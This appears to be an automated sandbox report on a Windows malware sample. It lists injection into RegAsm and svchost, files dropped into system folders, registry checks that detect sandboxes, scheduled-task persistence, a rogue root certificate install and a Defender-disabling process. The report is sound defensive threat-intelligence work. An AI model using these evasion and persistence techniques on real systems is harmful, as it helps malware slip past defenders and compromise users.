File opened for modification \??\PHYSICALDRIVE0 ttt01.exe
File opened for modification \??\PHYSICALDRIVE0 eeee.exe

flow	ioc
451	api.myip.com
453	ipinfo.io
1	ip-api.com
411	api.myip.com
411	ipinfo.io

description	ioc	process
File opened for modification	\??\PHYSICALDRIVE0	ttt01.exe
File opened for modification	\??\PHYSICALDRIVE0	eeee.exe

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\wininit.exe	autoit_exe
C:\Users\Admin\AppData\Local\directory\excel.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\a\go.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

sarra.exe

pid process

5476 sarra.exe

pid	process
5476	sarra.exe

Suspicious use of SetThreadContext 19 IoCs

Processes:

excel.exemedcallaboratory5.exeAdobe_update.exealexxxxxxxx.exeswiiii.execrypted_097f1784.execrypted_33cb9091.exenew.exeDocument.exediufhloadme.exedckuybanmlgp.exemsdtc.execrypted_69a30000.exepowershell.exeinte.exeswiiiii.exeAkh.exekoooooo.exe

description	pid	process	target process
PID 3444 set thread context of 4044	3444	excel.exe	svchost.exe
PID 4628 set thread context of 4820	4628	medcallaboratory5.exe	RegSvcs.exe
PID 3340 set thread context of 2688	3340	Adobe_update.exe	RegAsm.exe
PID 2108 set thread context of 2832	2108	alexxxxxxxx.exe	RegAsm.exe
PID 4528 set thread context of 4104	4528	swiiii.exe	RegAsm.exe
PID 5212 set thread context of 5820	5212	crypted_097f1784.exe	RegAsm.exe
PID 6132 set thread context of 6040	6132	crypted_33cb9091.exe	RegAsm.exe
PID 5884 set thread context of 6100	5884	new.exe	RegAsm.exe
PID 4920 set thread context of 3244	4920	Document.exe	Document.exe
PID 2180 set thread context of 1012	2180	diufhloadme.exe	vbc.exe
PID 1916 set thread context of 308	1916	dckuybanmlgp.exe	conhost.exe
PID 1916 set thread context of 3632	1916	dckuybanmlgp.exe	svchost.exe
PID 5660 set thread context of 5756	5660	msdtc.exe	msdtc.exe
PID 6076 set thread context of 300	6076	crypted_69a30000.exe	RegAsm.exe
PID 5608 set thread context of 5948	5608	powershell.exe	RegAsm.exe
PID 1712 set thread context of 4172	1712	inte.exe	inte.exe
PID 4912 set thread context of 5944	4912	swiiiii.exe	RegAsm.exe
PID 5128 set thread context of 2208	5128	Akh.exe	installutil.exe
PID 2420 set thread context of 5880	2420	koooooo.exe	RegAsm.exe

Drops file in Program Files directory 10 IoCs

Processes:

mstsc.exeagentDllDhcp.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe	mstsc.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\agentDllDhcp.exe	agentDllDhcp.exe
File created	C:\Program Files (x86)\Microsoft.NET\SearchHost.exe	agentDllDhcp.exe
File created	C:\Program Files (x86)\Microsoft.NET\cfa885d449487c	agentDllDhcp.exe
File created	C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe	mstsc.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fb4ee809d938d6	agentDllDhcp.exe
File created	C:\Program Files\Mozilla Firefox\services.exe	agentDllDhcp.exe
File created	C:\Program Files\Mozilla Firefox\c5b4cb5e9653cc	agentDllDhcp.exe
File created	C:\Program Files\Internet Explorer\SIGNUP\System.exe	agentDllDhcp.exe
File created	C:\Program Files\Internet Explorer\SIGNUP\27d1bcfc3c54e0	agentDllDhcp.exe

Drops file in Windows directory 2 IoCs

Processes:

Tester.exe

description ioc process

File created C:\Windows\svchost.exe Tester.exe
File opened for modification C:\Windows\svchost.exe Tester.exe
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

4884 sc.exe
4424 sc.exe
1848 sc.exe
2416 sc.exe

description	ioc	process
File created	C:\Windows\svchost.exe	Tester.exe
File opened for modification	C:\Windows\svchost.exe	Tester.exe

pid	process
4884	sc.exe
4424	sc.exe
1848	sc.exe
2416	sc.exe

Detects Pyinstaller 2 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\ckz_O3HM\nds.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 27 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4080	3340	WerFault.exe	Adobe_update.exe
908	4932	WerFault.exe	syncUpd.exe
6076	2092	WerFault.exe	mstsc.exe
6068	5212	WerFault.exe	crypted_097f1784.exe
4668	4016	WerFault.exe	ISetup5.exe
6060	6132	WerFault.exe	crypted_33cb9091.exe
5308	5804	WerFault.exe	Jufrxnb.exe
5516	5432	WerFault.exe	Jufrxnb.exe
5492	5852	WerFault.exe	Jufrxnb.exe
2248	5324	WerFault.exe	u33k.0.exe
5288	5748	WerFault.exe	u4j0.0.exe
1960	5868	WerFault.exe	ISetup1.exe
5584	6076	WerFault.exe	crypted_69a30000.exe
5092	4612	WerFault.exe	current.exe
5528	4912	WerFault.exe	swiiiii.exe
4524	2420	WerFault.exe	koooooo.exe
3568	3884	WerFault.exe	ISetup10.exe
2076	2104	WerFault.exe	u2zw.0.exe
4752	3924	WerFault.exe	fU9NBzdCm8tNVX4fcePhj2s5.exe
6452	4360	WerFault.exe	u310.0.exe
6352	2380	WerFault.exe	DemagogicAlewife.exe
6836	6476	WerFault.exe	afile.exe
2948	6476	WerFault.exe	afile.exe
4040	1400	WerFault.exe	f7qgmqPXBbSDRaWnPZQFlLbA.exe
7276	4364	WerFault.exe	timeSync.exe
7020	4916	WerFault.exe	boomlumma.exe
7740	7076	WerFault.exe	powershell.exe

Checks SCSI registry key(s) 3 TTPs 51 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

BroomSetup.exeexplorer.exeu33k.1.exeu2oo.1.exeu4j0.1.exetoolspub1.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	BroomSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u33k.1.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2oo.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4j0.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u33k.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u33k.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	BroomSetup.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	BroomSetup.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4j0.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2oo.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4j0.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2oo.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

u2oo.0.exeJufrxnb.exeRegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u2oo.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u2oo.0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Jufrxnb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	Jufrxnb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jufrxnb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Jufrxnb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	Jufrxnb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Jufrxnb.exe

Creates scheduled task(s) 1 TTPs 36 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2036	schtasks.exe
3416	schtasks.exe
5452	schtasks.exe
5764	schtasks.exe
2296	schtasks.exe
928	schtasks.exe
5780	schtasks.exe
5460	schtasks.exe
6316	schtasks.exe
1724	schtasks.exe
4244	schtasks.exe
5560	schtasks.exe
4740	schtasks.exe
5604	schtasks.exe
3328	schtasks.exe
5780	schtasks.exe
3164	schtasks.exe
2660	schtasks.exe
2912	schtasks.exe
5700	schtasks.exe
3892	schtasks.exe
5084	schtasks.exe
2944	schtasks.exe
4192	schtasks.exe
3020	schtasks.exe
1424	schtasks.exe
3912	schtasks.exe
648	schtasks.exe
6296	schtasks.exe
288	schtasks.exe
6064	schtasks.exe
3600	schtasks.exe
3756	schtasks.exe
3016	schtasks.exe
5160	schtasks.exe
5276	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1124 timeout.exe
5136 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3004 taskkill.exe

pid	process
1124	timeout.exe
5136	timeout.exe

pid	process
3004	taskkill.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

Jufrxnb.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	Jufrxnb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum\Version = "7"	Jufrxnb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum	Jufrxnb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	Jufrxnb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	Jufrxnb.exe

Modifies registry class 12 IoCs

Processes:

explorer.exeIjerkOff.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-647252928-2816094679-1307623958-1000\{BE01F7C1-AEAA-48E0-BFE5-9BED3B20EAB3}	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings	IjerkOff.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

RegAsm.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5408 PING.EXE

pid	process
5408	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

klounada.execccc.execrypted6077866846MVYQY.exepowershell.exedisable-defender.exeTester.exeu2oo.0.exepowershell.exeRegSvcs.exesvchost.exepowershell.exeRetailer_prog.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeDocument.exeRegAsm.exe

pid	process
1584	klounada.exe
1584	klounada.exe
1524	cccc.exe
1560	crypted6077866846MVYQY.exe
3368	powershell.exe
4976	disable-defender.exe
4976	disable-defender.exe
3368	powershell.exe
1560	crypted6077866846MVYQY.exe
1560	crypted6077866846MVYQY.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1472	u2oo.0.exe
1472	u2oo.0.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
1768	Tester.exe
4272	powershell.exe
4272	powershell.exe
4820	RegSvcs.exe
4820	RegSvcs.exe
5040	svchost.exe
2816	powershell.exe
2816	powershell.exe
2816	powershell.exe
2336	Retailer_prog.exe
2336	Retailer_prog.exe
1320	powershell.exe
1320	powershell.exe
1320	powershell.exe
3212	powershell.exe
3212	powershell.exe
1136	powershell.exe
1136	powershell.exe
3212	powershell.exe
1136	powershell.exe
1476	powershell.exe
1476	powershell.exe
296	powershell.exe
296	powershell.exe
296	powershell.exe
4920	Document.exe
4920	Document.exe
4920	Document.exe
4920	Document.exe
4920	Document.exe
4920	Document.exe
4104	RegAsm.exe
4104	RegAsm.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

New Text Document.exe

pid process

3548 New Text Document.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

680
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

excel.exemedcallaboratory5.exetoolspub1.exe

pid process

3444 excel.exe
4628 medcallaboratory5.exe
3220 toolspub1.exe

pid	process
3548	New Text Document.exe

pid	process
680

pid	process
3444	excel.exe
4628	medcallaboratory5.exe
3220	toolspub1.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

New Text Document.execccc.execrypted6077866846MVYQY.exepowershell.exedisable-defender.exeTester.exesvchost.exeBrawlB0t.exepowershell.exeRegSvcs.exevssvc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeTraffic.exeDocument.exemstsc.exeJufrxnb.exeJufrxnb.exeJufrxnb.exeJufrxnb.exepowershell.exepowershell.exepowershell.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exepropro.exeDocument.exenew1.exepowershell.exesvchost.exeRegAsm.exemsdtc.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeRuntimeBroker2.exeagentDllDhcp.exeghhjhjhsg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	3548	New Text Document.exe
Token: SeDebugPrivilege	1524	cccc.exe
Token: SeDebugPrivilege	1560	crypted6077866846MVYQY.exe
Token: SeDebugPrivilege	3368	powershell.exe
Token: SeDebugPrivilege	4976	disable-defender.exe
Token: SeImpersonatePrivilege	4976	disable-defender.exe
Token: SeDebugPrivilege	1768	Tester.exe
Token: SeDebugPrivilege	5040	svchost.exe
Token: SeDebugPrivilege	2876	BrawlB0t.exe
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeDebugPrivilege	4820	RegSvcs.exe
Token: SeDebugPrivilege	5040	svchost.exe
Token: SeBackupPrivilege	3412	vssvc.exe
Token: SeRestorePrivilege	3412	vssvc.exe
Token: SeAuditPrivilege	3412	vssvc.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeDebugPrivilege	1136	powershell.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	296	powershell.exe
Token: SeDebugPrivilege	3408	Traffic.exe
